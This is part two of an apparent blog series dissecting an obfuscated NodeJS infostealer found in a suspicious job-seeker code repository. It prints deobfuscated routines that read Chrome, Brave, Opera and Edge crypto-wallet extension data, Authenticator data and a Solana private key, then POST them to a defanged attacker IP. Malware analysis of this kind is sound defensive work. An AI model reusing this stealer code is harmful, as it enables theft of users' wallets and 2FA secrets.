This is the second part of dissecting the obfuscated NodeJS code. Just in case you missed the Part 1, you can read it here: https://tintinnya.com/2024/09/suspicious-code-repository-for-job-seeker-part-1/
From the first dropper discussed in the Part 1, I found another obfuscated NodeJS file named test.js which was downloaded from the IP address and port number hiding in the shuffled base64 encoded string.
This file also has medium entropy score 5.647697.
This NodeJS file is longer than the dropper. So, to manage the time effectively I simply focus the function that is executed or called only. There are several techniques that I’ve encountered in my past works that an obfuscated file is filled with non callable function, just to teased the analyst who conduct the static analyzing. This is the code structure collapsed so I can focus on executed function first.
Let’s use the same technique. I will be first focusing on these functions:
- (function (a4, a5) {}(a2, 951648));
- a0();
- it();
- let yt = setInterval(() => { (Gt += 1) < 4 ? it() : clearInterval(yt); }, 6e5);
Section 1: IIFE function (a4,a5)
Again, there is an IIFE denoted with function(a4,a5) to rotate the array of 123 elements of base64 encoded strings that is denoted using function a2, and the index picker by simply subtract the parameter with number 303 which is handled by function a3.
The array is shuffled 10 times to get the correct order.
Section 2: function a0()
Then the code is actually calling the function a0(). I’m not fully understand what does this a0 do, but judging from the code, I think it is checking the function a6 in second parameter to run only once. Which I don’t fully understand as well what is this a0.toString().search("(((.+)+)+)+$").tostring().constructor(a0).search("(((.+)+)+)+$") do.
Section 3: function it()
Then the function it() and starting to execute function M() and function ut():
const it = async () => {
const aS = as;
try {
l = Date[aS(373)](), await M(), ut();
} catch (a4) {}
};
// which then converted into a readable function it()
async function it() {
const aS = as; // as is equals to a3, that is a function to get whatever in the rotated array with index is substracted with 303 first.
try {
l = Date["now"](), await M(), ut()
} catch (a4) {}
}Section 3.1: function M()
The function M() is executed and function it() will wait until the execution of function M() is done. Let’s dissect it slowly for early step to get the idea how the obfuscation works in this code
M = async () => {
const aB = as;
T = hs, "d" == pl[0] && (T = T + "+" + uin[n(aB(388))]);
try {
const a4 = s("~/");
await S(Q, 0),
await S(q, 1),
await S(J, 2),
"w" == pl[0] ? (pa = "" + a4 + n(k) + n(aB(336)) + n(x),
await C(pa, "3_", false)) : "l" == pl[0] ? (await P(), await ot(), await rt()) : "d" == pl[0] && (await (async () => {
const aC = aB;
let a5 = [];
const a6 = n(W), a7 = n(aC(379)), a8 = n(aC(405));
if (pa = "" + hd + a7, a[m](pa)) try {
a5[aC(352)]({[R]: p(pa), [L]: {[V]: a8}});
} catch (a9) {} else {
if (pa += aC(325), a[m](pa)) try {
a5.push({[R]: p(pa), [L]: {[V]: a8}});
} catch (aa) {}
}
try {
const ab = n(Y);
let ac = "";
if (ac = "" + hd + n(U) + n(B), ac && "" !== ac && y(ac)) for (let ad = 0; ad < 200; ad++) {
const ae = ac + "/" + (0 === ad ? f : w + " " + ad) + "/" + a6;
try {
if (!y(ae)) continue;
const af = ac + aC(347) + ad;
y(af) ? a5[aC(352)]({[R]: p(af), [L]: {[V]: aC(400) + ad}}) : a[ab](ae, af, ag => {
const aD = aC;
let ah = [{[R]: p(ae), [L]: {[V]: aD(400) + ad}}];
H(ah);
});
} catch (ag) {}
}
} catch (ah) {}
return H(a5), a5;
})(), await D(), await lt()), await I(K, n(ct)), await I(tt, n(at));
} catch (a5) {}
}Let’s focus on the first 2 lines.
const aB = as;
T = hs, "d" == pl[0] && (T = T + "+" + uin[n(aB(388))]);
Variable aB is simply pointing to variable as that is defined in the very early lines of the files as a3, that is a function to get element of array a2 by subtracting the index with 303.
Variable T is refer to hs, that is hs = $[r(“caG9zdG5hbWU”)](). Let’s decode this step by step
T = hs
hs = $[r("caG9zdG5hbWU")]()
// while $ is defined as:
$ = require("os")
// and r is defined as:
r = a4 => (s1 = a4[as(418)](1), Buffer.from(s1, t)[as(413)](c));
// which then translated as...
r = a4 => (s1 = a4["slice"](1), Buffer.from(s1, "base64")["toString"]("utf8"));
// and simplified as...
r = a4 => (s1 = a4.slice(1), Buffer.from(s1, "base64").toString("utf8"));
// which then hs becomes...
hs = $["hostname"]()
// or...
T = hs = require("os").hostname()Then I can read that r is a function (a4) that delete the first char from a4, and decode the base64 string back to UTF-8. It makes the function hs = $[“hostname”]() or hs = require(“os”).hostname(). This shows that not all base64 strings can directly decoded back to plain string, as the function r() is the one who normalized the string by deleting the first char then decode it back.
"d" == pl[0] && (T = T + "+" + uin[n(aB(388))]);
// pl is defined as...
pl = $[r(as(307))]()
pl = $[r("YcGxhdGZvcm0"]()
pl = $["platform"]()
pl = require("os").platform()It is clear that pl = getting platform string by NodeJS. Refering to this tutorial page for NodeJS, the value of this function can return value of: ‘aix’, ‘darwin’, ‘freebsd’, ‘linux’, ‘openbsd’, ‘sunos’, or ‘win32’. And the only OS Platform starts with ‘d’ is ‘darwin’ that means macOS. Let’s talk about the remaining codes in the same line.
uin = $[r(as(395))]()
uin = $[r("AdXNlckluZm8")]()
uin = $["userInfo"]()
// this is the final what uin is
uin = require("os").userInfo()
// to decode this, I need what t and c are
const n = a4 => Buffer[as(392)](a4, t)[as(413)](c)
t = as(306)
c = as(380)
// change all t and c ...
const n = a4 => Buffer[as(392)](a4, t = as(306))[as(413)](as(380))
// and it becomes ...
const n = a4 => Buffer["from"](a4, "base64")["toString"]("utf8")
// which changed to ...
const n = a4 => Buffer.from(a4,"base64").toString("utf8")
// everything is in place, then translate this
uin[n(aB(388))])
uin[n("dXNlcm5hbWU")]
uin["username"]
require("os").userInfo().usernameThat’s little bit a long step to translate from uin[n(aB(388))] to require("os").userInfo().username. But that’s for showing how the obfuscation in this code. After this point, I’ll skip the nitty gritty and straight into the functionality. Go back to the line again, hence,
T = hs, "d" == pl[0] && (T = T + "+" + uin[n(aB(388))]);
// equals with...
T = require("os").hostname()
if ("d" == require("os").platform()[0]) {
T = T + "+" + require("os").userInfo().username;
}
It actually defining the variable T with hostname, but if it is macOS, then T is hostname+username. Let’s continue to the next line and its equivalent-yet-easy-to-read NodeJS code.
const a4 = s("~/");
s = a4 => a4[as(345)](/^~([a-z]+|\/)/, (a5, a6) => "/" === a6 ? hd : pt[n(as(412))](hd) + "/" + a6)
// equals with...
s = function (a4) {
return a4.replace(
/^~([a-z]+|\/)/,
function (a5, a6) {
return "/" === a6 ?
require("os").homedir() :
require("path").dirname(require("os").homedir()) + "/" + a6;
}
);
};
// s("~/") --> /home/users/
// s("~/Downloads") --> /home/users/DownloadsIn NodeJS, function replace with regex, can use function as the replacement value. Means that the variable a4 is actually referring to absolute homedir not using tilde notation.
Continuing to the next line: await S(Q, 0), this is calling function S() with parameter Q. Observing these S and Q:
Section 3.1.1 function S()
Take a look at function S and variable Q here that has been decoded and normalized:
Q = [
"Local/Google/Chrome",
"Google/Chrome",
"google-chrome"
]
await S(Q, 0)
S = async (a4, a5) => {
try {
const a6 = s("~/");
let a7 = "";
a7 = "d" == require("os").platform()[0]
? "" + a6 + "/Library/Application Support/" + a4[1]
: "l" == require("os").platform()[0]
? "" + a6 + /.config/ + a4[2]
: "" + a6 + "/AppData/" + a4[0] + "/User Data",
await C(a7, a5 + "_", 0 == a5);
} catch (a8) {}
}
S = async (Q, 0) => {
try {
const a6 = s("~/");
let a7 = "";
a7 = "d" == require("os").platform()[0]
? "" + a6 + "/Library/Application Support/" + Q[1]
: "l" == require("os").platform()[0]
? "" + a6 + "/.config/" + Q[2]
: "" + a6 + "/AppData/" + Q[0] + "/User Data",
await C(a7, "0_", true);
} catch (a8) {}
}
This function is preparing the variable a7 to be passed to function C(). The value of variable a7 is determined by the platform.
- If the platform is darwin that is for macOS, then
a7 = /Users/username/Library/Application Support/Google/Chrome - If the platform is linux, then
a7 = /home/username/.config/google-chrome - The malware creator assuming that this NodeJS is executed on win32, but instead there is ‘aix’ as well. Who runs NodeJS for AIX, said the malware creator. Hence I assume that this is Microsoft Windows then
a7 = C:\Users\username\AppDataLocal/Google/Chromeand yes this is not a valid path notation in win32, but it will be resolved by calling function C().
Section 3.1.1.1 function C()
Then what is function C() doing?
// await S(Q, 0) calls await C(a7, "0_", true);
C = async function(a4, a5, a6) {
const ay = as;
let a7 = a4;
if (!a7 || "" === a7) return [];
try {
if (!y(a7)) return [];
} catch (ac) {
return [];
}
a5 || (a5 = "");
let a8 = [];
const a9 = "Local Extension Settings",
aa = "Sync Extension Settings",
ab = "bhghoamapcdpbohphigoooaddinpkbai";
for (let ad = 0; ad < 200; ad++) {
const ae = 0 === ad ? "Default" : "Profile" + " " + ad,
af = a4 + "/" + ae + "/" + a9;
for (let ah = 0; ah < E.length; ah++) {
const ai = n(E[ah] + A[ah]);
let aj = af + "/" + ai;
if (y(aj)) {
try {
far = require("fs").readdirSync(aj);
} catch (ak) {
far = [];
}
far.forEach(async al => {
const az = ay;
a7 = require("path").join(aj, al);
try {
a8.push({"options": {"filename": "" + a5 + ad + "_" + ai + "_" + al}, "value": require("fs").createReadStream(a7)});
} catch (am) {}
});
}
}
const ag = a4 + "/" + ae + "/" + aa + "/" + ab;
if (y(ag)) {
try {
far = require("fs").readdirSync(ag);
} catch (al) {
far = [];
}
far.forEach(async am => {
const aA = ay;
a7 = require("path").join(ag, am);
try {
a8.push({"options": {"filename": "" + a5 + ad + "_" + ab + "_" + am}, "value": require("fs").createReadStream(a7)});
} catch (an) {}
});
}
}
if (a6) {
const am = "solana_id.txt";
if (a7 = "" + hd + "/.config/solana/id.json", require("fs").existsSync(a7)) try {
a8.push({"value": require("fs").createReadStream(a7), "options": {"filename": am}});
} catch (an) {}
}
return H(a8), a8;
}It enumerates all profiles in Google Chrome based on the detected platform, so the variable af in macOS will be something like
/Users/username/Library/Application Support/Google/Chrome/Default/Local Extension Settings/Users/username/Library/Application Support/Google/Chrome/Profile 1/Local Extension Settings- …
/Users/username/Library/Application Support/Google/Chrome/Profile 199/Local Extension Settings
Then what extensions that this code are looking for? Let see the variable ai that combines E and A as follows
E = [
"nkbihfbeogaeaoe",
"ejbalbakoplchlg",
"ibnejdfjmmkpcnl",
"fhbohimaelbohpj",
"hnfanknocfeofbd",
"bfnaelmomeimhlp",
"aeachknmefph",
"egjidjbpglic",
"hifafgmccdpe",
"aholpfdialjg",
"mcohilncbfah",
"pdliaogehgdb"
]
A = [
"hlefnkodbefgpgknn",
"hecdalmeeeajnimhm",
"pebklmnkoeoihofec",
"bbldcngcnapndodjp",
"dgcijnmhnfnkdnaad",
"mgjnjophhpkkoljpa",
"epccionboohckonoeemg",
"hdcondbcbdnbeeppgdph",
"kplomjjkcfgodnhcellj",
"jfhomihkjbmgjidlcdno",
"bmgdjkbpemcciiolgcge",
"hbnmkklieghmmjkpigpa"
]
ai = [
"nkbihfbeogaeaoehlefnkodbefgpgknn",
"ejbalbakoplchlghecdalmeeeajnimhm",
"ibnejdfjmmkpcnlpebklmnkoeoihofec",
"fhbohimaelbohpjbbldcngcnapndodjp",
"hnfanknocfeofbddgcijnmhnfnkdnaad",
"bfnaelmomeimhlpmgjnjophhpkkoljpa",
"aeachknmefphepccionboohckonoeemg",
"egjidjbpglichdcondbcbdnbeeppgdph",
"hifafgmccdpekplomjjkcfgodnhcellj",
"aholpfdialjgjfhomihkjbmgjidlcdno",
"mcohilncbfahbmgdjkbpemcciiolgcge",
"pdliaogehgdbhbnmkklieghmmjkpigpa"
]Previous experiences show that this is the chrome extension ID, which then translated to
- nkbihfbeogaeaoehlefnkodbefgpgknn –> Metamask.io
- ejbalbakoplchlghecdalmeeeajnimhm –> ?
- ibnejdfjmmkpcnlpebklmnkoeoihofec –> TronLink
- fhbohimaelbohpjbbldcngcnapndodjp –> BNB Chain Wallet
- hnfanknocfeofbddgcijnmhnfnkdnaad –> Coinbase Wallet extension
- bfnaelmomeimhlpmgjnjophhpkkoljpa –> Phantom
- aeachknmefphepccionboohckonoeemg –> Coin98 Wallet
- egjidjbpglichdcondbcbdnbeeppgdph –> Trust Wallet
- hifafgmccdpekplomjjkcfgodnhcellj –> Crypto.com | Onchain Extension
- aholpfdialjgjfhomihkjbmgjidlcdno –> Exodus Web3 Wallet
- mcohilncbfahbmgdjkbpemcciiolgcge –> OKX Wallet
- pdliaogehgdbhbnmkklieghmmjkpigpa –> Bybit Wallet
What are the common things from those extensions ID? Extension number 2 will be answered below, but all of those extensions are wallet for Cryptocurrency. Now I notice that this is kind of Infostealer that steal users’ wallet data that are stored under the web browser. Because after enumerates all 200 hundreds profile, it will read the content of the files under that folders and push it to the array a8 with this structure:
{"options": {
"filename": "" + "0_" + profile_index + "" + extension_id + "" + filename_under_extension_id_folder
},
"value": require("fs").createReadStream(a7)
}Then I noticed there is a lonely extension ID, which then I translated that as
- bhghoamapcdpbohphigoooaddinpkbai –> Authenticator
That’s right. That is the TOTP generator based on the seed you provided to this and it will generate 6 digit timebased-one time password, that is usually being used together with your password to your vault, that might be also to protect your cryptocurrency wallet. This extension is downloaded by more than 6 million users.
This extension also pushed to the a8 array with data structure:
{"options": {
"filename": "" + "0_" + profile_index + "_" + extension_id_authenticator + "_" + filename_under_extension_authenticator_folder},
"value": require("fs").createReadStream(a7)
}Key Takeway #5:
Always pick 2FA TOTP application that has strong protections both storing and displaying the TOTP. I’m not saying that this Authenticator is not secure, but I did use this extension long time ago and my impression was whoever has access to my Google Chrome will be able to see the TOTP, and not necessarily the seeds itself. Since then I moved to the more secure application e.g. YubiKey Application, LastPass, 1Password, Keeper, etc. to my other devices.
The next part is only applicable when the a6 value is true, that is only for the a5 = 0. This part is only stealing the Solana private key in platform ‘linux’ and push the value to a8 array with data structure:
{ "value": require("fs").createReadStream(a7),
"options": {
"filename": "solana_id.txt"
}
}And for the final block, it calls function H().
Section 3.1.1.1.1 function H()
This is the final function call from the first line on function M().
h = function () {
let a4 = "MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ";
for (var a5 = "", a6 = "", a7 = "", a8 = "", a9 = 0; a9 < 10; a9++)
a5 += a4[a9],
a6 += a4[10 + a9],
a7 += a4[20 + a9],
a8 += a4[30 + a9];
return a5 = a5 + a7 + a8, n(a6) + n(a5);
}
const H = function(a4) {
a7 = "/uploads",
a8 = {"timestamp": Date.now().toString(), type: "s2DzOA8", hid: "comp", "multi_file": a4},
a9 = h(); // hxxp://147[.]124.214.129:1244
try {
let aa = {"url": "hxxp://147[.]124.214.129:1244/uploads", "formData": a8};
require("request").post(aa, (ab, ac, ad) => {});
} catch (ab) {}
}the function h() is reshuffling the base64 string and decode it as hxxp://147[.]124.214.129:1244. Then function H(a8) is sending POST data to hxxp://147[.]124.214.129:1244/uploads with data as follows, assuming the victim is using macOS:
{
"timestamp": Date.now().toString(),
type: "s2DzOA8",
hid: "comp",
"multi_file": content_of_array_a8
}So, await S(Q,0) is reading browser extensions for Google Chrome on Linux, Apple macOS, and Microsoft Windows for those 12 cryptocurrency wallet, Authenticator browser extensions, and Solana Private Key (only under Linux Google Chrome), then upload those data to hxxp://147[.]124.214.129:1244/uploads using POST method
But, don’t ever think that: “oh, luckily I’m not using Google Chrome web browser, so I’m not prone to be attacked with this infostealer.” You got it wrong!
q = [
"Local/BraveSoftware/Brave-Browser",
"BraveSoftware/Brave-Browser",
"BraveSoftware/Brave-Browser"
]
J = [
"Roaming/Opera Software/Opera Stable",
"com.operasoftware.Opera",
"opera"
]
await S(q, 1),
await S(J, 2),
Remember the browser extension ID number 2? Yes, Brave and Opera still not having that browser extension yet. Hold on to it. But after Google Chrome, this code is also stealing browser extension data from Brave and Opera.
What next?
"w" == pl[0]
? (pa = "" + require("os").homedir() + "/AppData/" + "Local/Microsoft/Edge" + "/User Data",await C(pa, "3_", false))
: "l" == pl[0]
? (await P(), await ot(), await rt())
: "d" == pl[0] && (await (async () => {=})(),Simply put:
- If win32 then get all 13 browser extensions for Microsoft Edge
- there it goes, the extension ID ejbalbakoplchlghecdalmeeeajnimhm is Metamask for Microsoft Edge
- Else If linux then execute function P(), ot(), rt()
- Else if darwin then execute this function, D() and lt()
Section 3.1.2 function P()
Will be discussed on Part 3 of this article.
Section 3.1.3 function ot()
Will be discussed on Part 3 of this article.
Section 3.1.4 function rt()
Will be discussed on Part 3 of this article.
Section 3.1.5 Function for ‘darwin’
Will be discussed on Part 3 of this article.
Section 3.1.5.1 function D()
Will be discussed on Part 3 of this article.
Section 3.1.5.2 function lt()
Will be discussed on Part 3 of this article.
Section 3.1.6 function I()
Will be discussed on Part 3 of this article.
Section 3.2: function ut()
Will be discussed on Part 3 of this article.
Section 4: variable yt
The let yt = setInterval(() => { (Gt += 1) < 4 ? it() : clearInterval(yt); }, 6e5); be discussed on Part 3 of this article.